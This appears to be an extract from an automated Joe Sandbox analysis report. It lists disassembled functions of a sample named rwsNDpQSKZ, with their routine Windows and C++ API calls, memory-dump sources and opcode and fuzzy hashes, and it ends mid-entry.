                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,9FB8111D,?,00000000,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2A5C
                • ?FreeDuplicatedObj@CCmmArchiveServiceImp@Archive@Cmm@@QAEXPAVICmmArchiveObject@3@@Z.RWSNDPQSKZ(?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2A73
                  • Part of subcall function 00CA5520: __EH_prolog3.LIBCMT ref: 00CA5527
                  • Part of subcall function 00CA5520: EnterCriticalSection.KERNEL32(?,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA5542
                  • Part of subcall function 00CA5520: ?FindDuplicatedPackageWithoutLock@CCmmArchiveServiceImp@Archive@Cmm@@IAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVCCmmArchivePackageTree@Archive@Cmm@@@std@@@std@@@std@@PAVICmmArchiveObject@3@@Z.RWSNDPQSKZ(?,00000000,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA5555
                  • Part of subcall function 00CA5520: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000000,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA5573
                  • Part of subcall function 00CA5520: LeaveCriticalSection.KERNEL32(?,?,00000000,0000000C,00CA2AA9,?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA55A0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,9FB8111D,?,00000000,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2A8D
                • ?FreeDuplicatedObj@CCmmArchiveServiceImp@Archive@Cmm@@QAEXPAVICmmArchiveObject@3@@Z.RWSNDPQSKZ(?,?,?,00000000,00D1604C,000000FF,?,00C5D377), ref: 00CA2AA4
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Archive$Cmm@@$Archive@$DuplicatedImp@Object@3@@ServiceState@Unlock@$CriticalFreeObj@PackageSectionV?$_$Cmm@@@std@@@std@@@std@@EnterFindH_prolog3LeaveLock@Simple_types@Tree@U?$_Vector_iterator@Vector_val@Without
                • String ID:
                • API String ID: 3121036383-0
                • Opcode ID: 740ac89c9a89bcf57303fe698e7e1ad7805159921059695d8491c617559609ab
                • Instruction ID: d3a3e748866473b6541faf42450edea49e457e3b81d742d68fbb95c0d517044e
                • Opcode Fuzzy Hash: 740ac89c9a89bcf57303fe698e7e1ad7805159921059695d8491c617559609ab
                • Instruction Fuzzy Hash: 94112B71B00626AFDB10CF98C880B6AB7E9FF49714F008529E916DB391DBB5EC008B60
                Function 00CAC268 Relevance: 6.1, APIs: 4, Instructions: 59timeCOMMON
                Download Yara Rule
                APIs
                • CancelIo.KERNEL32(?,?,?,?,?,?,00C78290), ref: 00CAC283
                • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,00C78290), ref: 00CAC292
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00C78290), ref: 00CAC2A1
                • _InternalDeleteHelper.LIBCONCRT(?,?,?,?,?,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00CAC2EB
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CancelCloseCmm@@DeleteHandleHelperInternalNow@Time@V12@
                • String ID:
                • API String ID: 2841174988-0
                • Opcode ID: f6326b65f04c4177bcbcd35dedfb7a701f15f701adfd7a8d1c76e1d1f669cdd3
                • Instruction ID: 594192f26f03b812cf68f71aeafcef40211e26aa3bd0f9c4444a6842600a1ac8
                • Opcode Fuzzy Hash: f6326b65f04c4177bcbcd35dedfb7a701f15f701adfd7a8d1c76e1d1f669cdd3
                • Instruction Fuzzy Hash: F211D031514B469FD7359BA9C889B62B7F5AB42328F14471DE4A382AE0DBB0F945CB40
                Function 00C78210 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • ?Connect@Channel@ssb_ipc@@QAE_NXZ.RWSNDPQSKZ ref: 00C7822B
                • EnterCriticalSection.KERNEL32(?,000000FF), ref: 00C78247
                • LeaveCriticalSection.KERNEL32(?), ref: 00C78251
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00C78269
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalSection$Channel@ssb_ipc@@Cmm@@Connect@EnterLeaveState@Unlock@
                • String ID:
                • API String ID: 2808090347-0
                • Opcode ID: b8e8a523223a541d43e47ee230f0fd752b28034c29a3e4b30c46914d93d0bf6d
                • Instruction ID: f7939efdc42c24efd6d53cdcf90a13c62469141e82debd1abca7fa693428716d
                • Opcode Fuzzy Hash: b8e8a523223a541d43e47ee230f0fd752b28034c29a3e4b30c46914d93d0bf6d
                • Instruction Fuzzy Hash: 8911C271640714BFCF04DFB4C8889AEB7B9BF457503148259E91697342DF30BD499BA0
                Function 00CDA000 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                Download Yara Rule
                APIs
                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CDA062
                • VerSetConditionMask.KERNEL32(00000000), ref: 00CDA06A
                • VerSetConditionMask.KERNEL32(00000000), ref: 00CDA072
                • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00CDA09E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ConditionMask$InfoVerifyVersion
                • String ID:
                • API String ID: 2793162063-0
                • Opcode ID: b57a802c85d03ca1a7cfd5855b1a16670127f949bcf0c354625f04cb9961d530
                • Instruction ID: 60a5b2c8156916fe66a7c67d7b644e4588076289d3173b74f89b30c1a116c4b4
                • Opcode Fuzzy Hash: b57a802c85d03ca1a7cfd5855b1a16670127f949bcf0c354625f04cb9961d530
                • Instruction Fuzzy Hash: 7A1124B0940318BAEB60DF60EC0ABEA77BDEB48700F004059B508E62C0D7754B548BA0
                Function 00CE0670 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE068D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE06ED
                • TerminateProcess.KERNEL32(00000000), ref: 00CE06F4
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE06FB
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 158244a4e8bd8d9a7762455cb0ad5e327c6c07d252f5f87e79836b10bd18a402
                • Instruction ID: 3c91ea49da58745d2a994bc1e54e8f2d3b4f82279bc1599a9e0bff2611975e30
                • Opcode Fuzzy Hash: 158244a4e8bd8d9a7762455cb0ad5e327c6c07d252f5f87e79836b10bd18a402
                • Instruction Fuzzy Hash: 74117C72514304AFC700DF68D885B9B77E8FB88715F00461AF959D7240DBB0AA44CBA2
                Function 00CBC7AF Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBC7B6
                  • Part of subcall function 00CA6112: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,00CA60F2,?,?,?,00000004), ref: 00CA6161
                  • Part of subcall function 00CA8006: __EH_prolog3.LIBCMT ref: 00CA800D
                  • Part of subcall function 00CA7EE4: __EH_prolog3.LIBCMT ref: 00CA7EEB
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(02492502,024924E6,024924DE,02492496,00000004,unordered_map/set too long,?,?,00000000,?,00000018,unordered_map/set too long,?,?,00000000,?), ref: 00CBC816
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(02492522,02492502,024924E6,024924DE,02492496,00000004,unordered_map/set too long,?,?,00000000,?,00000018,unordered_map/set too long,?,?,00000000), ref: 00CBC838
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(0249253E,02492522,02492502,024924E6,024924DE,02492496,00000004,unordered_map/set too long,?,?,00000000,?,00000018,unordered_map/set too long,?,?), ref: 00CBC84E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@StringV01@@$H_prolog3
                • String ID:
                • API String ID: 709177685-0
                • Opcode ID: 8cc1ff51fd07db066109ab75f1fc5a62f2c6fc3f1b0b38ccd6d45a8146a5964f
                • Instruction ID: 515198ca51dbb1a03fd8e15b96b811909a7cfcca52b0ccca291ea6c95b8e4776
                • Opcode Fuzzy Hash: 8cc1ff51fd07db066109ab75f1fc5a62f2c6fc3f1b0b38ccd6d45a8146a5964f
                • Instruction Fuzzy Hash: 3D2133B5900B46EFC715DB64C080ADAF7F8BF15304F00896EE59683751DB70BA18DBA0
                Function 00CE2016 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE201D
                • CoCreateGuid.OLE32(00000000,00000010,00CDE40F,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CE2048
                • UuidToStringA.RPCRT4(00000000,00000000), ref: 00CE2057
                  • Part of subcall function 00CDC26F: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC28A
                  • Part of subcall function 00CDC26F: GetProcessHeap.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC29C
                  • Part of subcall function 00CDC26F: HeapAlloc.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2A3
                  • Part of subcall function 00CDC26F: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,000000FF,00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2BF
                  • Part of subcall function 00CDC26F: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2CB
                  • Part of subcall function 00CDC26F: HeapFree.KERNEL32(00000000,?,?,00CE2074,00000000,?,dbghelp.dll), ref: 00CDC2D2
                • RpcStringFreeA.RPCRT4(00000000), ref: 00CE2080
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$ByteCharFreeMultiProcessStringWide$AllocCreateGuidH_prolog3Uuid
                • String ID:
                • API String ID: 39390664-0
                • Opcode ID: 0f11c7fed89d707c475cdd1e43ceb4e228b1618fe83e3d9d91302eb2db886181
                • Instruction ID: 618ccf1a6aa4209e81524c7b99ef44d901e8dadbd8d2f61ad964d98d03be61ea
                • Opcode Fuzzy Hash: 0f11c7fed89d707c475cdd1e43ceb4e228b1618fe83e3d9d91302eb2db886181
                • Instruction Fuzzy Hash: 7D014C71E0421A9BDB05EFB59C867FF77B9BF04700F00442AB224E6291DF785642EB91
                Function 00CE0870 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE088D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE08E4
                • TerminateProcess.KERNEL32(00000000), ref: 00CE08EB
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE08F2
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: a46f23e14610ab7a75339450bcb9f1fc720313f6b424bf3d62ad293bfe3c16ec
                • Instruction ID: 1993774bc454ac5a18baf7e4d67b91ea18d240bedd27041bb2f4bcdfb84cea57
                • Opcode Fuzzy Hash: a46f23e14610ab7a75339450bcb9f1fc720313f6b424bf3d62ad293bfe3c16ec
                • Instruction Fuzzy Hash: 1F01C472510304ABC710EF64DC89B9A73ECFB48710F004519F958C3291DBB09A4587E2
                Function 00CE2AF4 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CE2B00
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,00CE299E,?,?,00CE2A1B), ref: 00CE2B25
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000000,?,?,?,?,?,00CE299E,?,?,00CE2A1B), ref: 00CE2B3F
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CE2B5B
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@LockitState@Unlock@std::_$Lockit::_Lockit::~_
                • String ID:
                • API String ID: 3239895389-0
                • Opcode ID: dc798cdea6a9eef751249c7ed41ed0421db9f96888eee8e96ee0ad26e11dbfc1
                • Instruction ID: d381a5bca8e14aae1a0a7529fb0088adaf2048068df13294bf9263b46cffb2a9
                • Opcode Fuzzy Hash: dc798cdea6a9eef751249c7ed41ed0421db9f96888eee8e96ee0ad26e11dbfc1
                • Instruction Fuzzy Hash: 95018F35A00254AFCB05DF16C895F9DBB79EF84750B144099E8029B3A1EF70FE41CBA0
                Function 00CBC995 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBC99C
                  • Part of subcall function 00CA66D4: ??0?$CStringT@_W@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,?,?,?,00CA66CA,?,?,?,00000004), ref: 00CA671F
                • ??0?$CStringT@_W@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,00000000,000000C8,00000000,00000004,00CBB099,?,0000000C,00CB9B86,?,?,00000000,?,?,00000000,?), ref: 00CBC9F8
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(000000C8,?,00000000,000000C8,00000000,00000004,00CBB099,?,0000000C,00CB9B86,?,?,00000000,?,?,00000000), ref: 00CBCA16
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,000000C8,?,00000000,000000C8,00000000,00000004,00CBB099,?,0000000C,00CB9B86,?,?,00000000,?,?), ref: 00CBCA28
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@E@$$StringV01@@$H_prolog3
                • String ID:
                • API String ID: 3920246026-0
                • Opcode ID: d6c873c06e7fb219bf2346b5e1fd8c19ecb7dd8fcaafd80572c522b41e2d1a0f
                • Instruction ID: 9bed5750373b4a5b651824afd6f3351ec544b58a66997d260db5beb82d2502e0
                • Opcode Fuzzy Hash: d6c873c06e7fb219bf2346b5e1fd8c19ecb7dd8fcaafd80572c522b41e2d1a0f
                • Instruction Fuzzy Hash: E411A4B5500B06EFC715DF75C481ADAF7E8BF15304F00492AE59683751DB70BA18DB90
                Function 00CE0A00 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE0A1D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0A6D
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0A74
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE0A7B
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 1f8248d1499b902a2cd46138c723ec94462a8d5cc56bd179c0d89d9b13ce66ae
                • Instruction ID: 28b7302dab66f84702b4e0a2f73ec0afc8b4018c8cd545da3b96170e39c50209
                • Opcode Fuzzy Hash: 1f8248d1499b902a2cd46138c723ec94462a8d5cc56bd179c0d89d9b13ce66ae
                • Instruction Fuzzy Hash: 3E01B572810304BBC310AF64AC49BAB73ACFB48711F000519F919C3251DBB0594587F2
                Function 00CE0460 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE047D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE04C5
                • TerminateProcess.KERNEL32(00000000), ref: 00CE04CC
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE04D3
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
